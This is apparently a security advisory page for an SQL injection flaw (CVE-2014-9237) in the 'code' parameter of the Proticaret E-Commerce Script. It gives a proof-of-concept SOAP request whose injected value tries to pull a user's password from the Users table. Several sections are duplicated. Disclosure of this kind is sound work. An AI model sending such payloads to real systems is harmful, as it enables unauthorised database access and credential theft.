Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
BID:71223
Info
Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 71223 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-9237 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 13 2014 12:00AM |
| Updated: | Dec 05 2014 12:58AM |
| Credit: | Bilgi Güvenligi Akademisi |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
Proticaret E-Commerce Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Proticaret E-Commerce Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
An attacker can exploit this issue using a browser.
The following example request is available:
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
An attacker can exploit this issue using a browser.
The following example request is available:
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Solution / Fix
Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
References
Proticaret E-Commerce Script 'code' Parameter SQL Injection Vulnerability
References:
References: